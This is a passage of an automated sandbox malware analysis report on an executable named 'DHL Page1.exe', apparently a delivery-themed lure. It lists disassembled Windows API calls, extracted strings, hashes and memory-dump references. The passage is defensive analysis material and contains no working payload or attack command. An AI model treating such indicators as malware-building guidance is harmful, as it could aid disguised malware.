                                              • Instruction Fuzzy Hash: 95E18971A04709DFDB24CF58C880BAAB7F5FB45305F15842EE4A7AB2D1D738AA91CB04
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2920c341a9a1d76e0493e385feff17d8f9932f604053425012d67906270e821b
                                              • Instruction ID: 564d74dd85b05f1e5e36e571070c9b926b4df29f1dff4fc62af0c2e15a1c89df
                                              • Opcode Fuzzy Hash: 2920c341a9a1d76e0493e385feff17d8f9932f604053425012d67906270e821b
                                              • Instruction Fuzzy Hash: 97C14831E042599BCF14CF68C8905EEBBB2FF99314F25826AD85677380D738A942CF95
                                              APIs
                                              • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404533
                                              • GetDlgItem.USER32(?,000003E8), ref: 00404547
                                              • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404564
                                              • GetSysColor.USER32(?), ref: 00404575
                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404583
                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404591
                                              • lstrlenW.KERNEL32(?), ref: 00404596
                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045A3
                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004045B8
                                              • GetDlgItem.USER32(?,0000040A), ref: 00404611
                                              • SendMessageW.USER32(00000000), ref: 00404618
                                              • GetDlgItem.USER32(?,000003E8), ref: 00404643
                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404686
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404694
                                              • SetCursor.USER32(00000000), ref: 00404697
                                              • ShellExecuteW.SHELL32(0000070B,open,00432EC0,00000000,00000000,?), ref: 004046AC
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004046B8
                                              • SetCursor.USER32(00000000), ref: 004046BB
                                              • SendMessageW.USER32(00000111,?,00000000), ref: 004046EA
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004046FC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                              • String ID: Call$N$open
                                              • API String ID: 3615053054-2563687911
                                              • Opcode ID: 23ba4926f2af4e3002159a8cecaad795e2373b7570d19f5d1db836182dd8a1ae
                                              • Instruction ID: e5e8d6a75732f79a66591b86f6074e0eb71284cea18164b411d2f65b54fa01cd
                                              • Opcode Fuzzy Hash: 23ba4926f2af4e3002159a8cecaad795e2373b7570d19f5d1db836182dd8a1ae
                                              • Instruction Fuzzy Hash: 3E71A2B1900209BFDB109F64DD85E6A7B69FB85345F00813AF705B61E1C778A951CFA8
                                              APIs
                                              • lstrcpyW.KERNEL32(00430928,NUL,?,00000000,?,?,004060F6,?,?), ref: 00405F72
                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,004060F6,?,?), ref: 00405F96
                                              • GetShortPathNameW.KERNEL32(?,00430928,00000400), ref: 00405F9F
                                                • Part of subcall function 00405D6E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040604F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D7E
                                                • Part of subcall function 00405D6E: lstrlenA.KERNEL32(00000000,?,00000000,0040604F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DB0
                                              • GetShortPathNameW.KERNEL32(00431128,00431128,00000400), ref: 00405FBC
                                              • wsprintfA.USER32 ref: 00405FDA
                                              • GetFileSize.KERNEL32(00000000,00000000,00431128,C0000000,00000004,00431128,?,?,?,?,?), ref: 00406015
                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406024
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040605C
                                              • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,00430528,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 004060B2
                                              • GlobalFree.KERNEL32(00000000), ref: 004060C3
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004060CA
                                                • Part of subcall function 00405E09: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\DHL Page1.exe,80000000,00000003), ref: 00405E0D
                                                • Part of subcall function 00405E09: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405E2F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                              • String ID: %ls=%ls$(C$NUL$[Rename]
                                              • API String ID: 222337774-72960442
                                              • Opcode ID: 7553ad5cd71c1ef7a98dd65b51d8272dbea6620f94bcf13e55a0f0d5cc37ec1b
                                              • Instruction ID: c67de212038e3a4af8140532607d6f3a547529e5eadb3b3fd184e868b7ff9b5d
                                              • Opcode Fuzzy Hash: 7553ad5cd71c1ef7a98dd65b51d8272dbea6620f94bcf13e55a0f0d5cc37ec1b
                                              • Instruction Fuzzy Hash: D0315130240714BFC220AB618C08F6B3A5CEF45754F19043BBE46F72C2EA7C98218ABD
                                              APIs
                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                              • DeleteObject.GDI32(?), ref: 004010ED
                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                              • DrawTextW.USER32(00000000,00433F20,000000FF,00000010,00000820), ref: 00401156
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                              • DeleteObject.GDI32(?), ref: 00401165
                                              • EndPaint.USER32(?,?), ref: 0040116E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              • API String ID: 941294808-1304234792
                                              • Opcode ID: 426f8331f305b440d8f3c7315c7afc314279e01a7aa5745e62d85699e054dbbd
                                              • Instruction ID: f7911764392b9a17fffa549c6d134d4cd78750cd14e3def71fe8602ed1918a64
                                              • Opcode Fuzzy Hash: 426f8331f305b440d8f3c7315c7afc314279e01a7aa5745e62d85699e054dbbd
                                              • Instruction Fuzzy Hash: 6E418C71800209AFCF058F95DE459AFBBB9FF44311F04842EF991AA1A0C738EA54DFA4
                                              APIs
                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,754F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Page1.exe",00403447,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 0040652B
                                              • CharNextW.USER32(?,?,?,00000000), ref: 0040653A
                                              • CharNextW.USER32(?,00000000,754F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Page1.exe",00403447,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 0040653F
                                              • CharPrevW.USER32(?,?,754F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Page1.exe",00403447,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 00406552
                                              Strings
                                              • "C:\Users\user\Desktop\DHL Page1.exe", xrefs: 004064C8
                                              • *?|<>/":, xrefs: 0040651A
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004064C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: "C:\Users\user\Desktop\DHL Page1.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 589700163-2015293035
                                              • Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                              • Instruction ID: aa88e0b7aecc0033cd1108ea3c2cad879a6bfb3d08b9415eadf08646bb23ef80
                                              • Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                              • Instruction Fuzzy Hash: 6711B615800612A5DB303B14AD40A7766F8AF55754B52803FE996732C5E77C8C9286BD
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040437C
                                              • GetSysColor.USER32(00000000), ref: 00404398
                                              • SetTextColor.GDI32(?,00000000), ref: 004043A4
                                              • SetBkMode.GDI32(?,?), ref: 004043B0
                                              • GetSysColor.USER32(?), ref: 004043C3
                                              • SetBkColor.GDI32(?,?), ref: 004043D3
                                              • DeleteObject.GDI32(?), ref: 004043ED
                                              • CreateBrushIndirect.GDI32(?), ref: 004043F7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                              • Instruction ID: 04f1978116a7d7d81479d7bff493c907bf48530d99e9da5d87c5abe129d5bb58
                                              • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                              • Instruction Fuzzy Hash: C22163B1500744AFCB219F68ED08B4BBBF8AF41714F05892DED96E26E0D738E914CB64
                                              APIs
                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402E4E
                                              • GetTickCount.KERNEL32 ref: 00402E6C
                                              • wsprintfW.USER32 ref: 00402E9A
                                                • Part of subcall function 00405393: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053CB
                                                • Part of subcall function 00405393: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053DB
                                                • Part of subcall function 00405393: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00402EAD,00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000), ref: 004053EE
                                                • Part of subcall function 00405393: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll), ref: 00405400
                                                • Part of subcall function 00405393: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405426
                                                • Part of subcall function 00405393: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405440
                                                • Part of subcall function 00405393: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040544E
                                              • CreateDialogParamW.USER32(0000006F,00000000,00402D98,00000000), ref: 00402EBE
                                              • ShowWindow.USER32(00000000,00000005), ref: 00402ECC
                                                • Part of subcall function 00402E17: MulDiv.KERNEL32(00058000,00000064,0005BFF3), ref: 00402E2C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                              • String ID: ... %d%%
                                              • API String ID: 722711167-2449383134
                                              • Opcode ID: 46287af5fdd5f1de6768bbfce07bad43e038cb8b2988b403a44dfbeb7f947424
                                              • Instruction ID: 5298ff6c404150fef068ea564290178245c54639b3e83396ddb2e121dc62f9f8
                                              • Opcode Fuzzy Hash: 46287af5fdd5f1de6768bbfce07bad43e038cb8b2988b403a44dfbeb7f947424
                                              • Instruction Fuzzy Hash: 9601C471480624ABC7216B60EF4CA9B7B68AB04B05B14003BF941B15E1DBF858958FDD
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C78
                                              • GetMessagePos.USER32 ref: 00404C80
                                              • ScreenToClient.USER32(?,?), ref: 00404C9A
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404CAC
                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404CD2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                              • Instruction ID: c6d879f8106e07a7acade85d47e0aa80a2bd0c574060fa345ecf2cf46207e522
                                              • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                              • Instruction Fuzzy Hash: 9D015E7190121CBAEB00DBA4DD85FFEBBBCAF58711F10012BBB51B61C0C7B49A018BA4
                                              APIs
                                              • GetDC.USER32(?), ref: 00401DB6
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                              • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                              • CreateFontIndirectW.GDI32(0040CE08), ref: 00401E38
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                              • String ID: Tahoma
                                              • API String ID: 3808545654-3580928618
                                              • Opcode ID: d1f771cd4411ada8962552a85e70aeb8769f02ea85257ba4ef179026fd5e666f
                                              • Instruction ID: 4158a01f97be71fecde82e93e8d02092eb0a88b9f45ff234c419069dd8c53e9e
                                              • Opcode Fuzzy Hash: d1f771cd4411ada8962552a85e70aeb8769f02ea85257ba4ef179026fd5e666f
                                              • Instruction Fuzzy Hash: E301B571544240EFE7105BB0EF8A79E3FB0AB95301F24097DF641B61E2CAF801558BAC
                                              APIs
                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DB6
                                              • wsprintfW.USER32 ref: 00402DEA
                                              • SetWindowTextW.USER32(?,?), ref: 00402DFA
                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E0C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
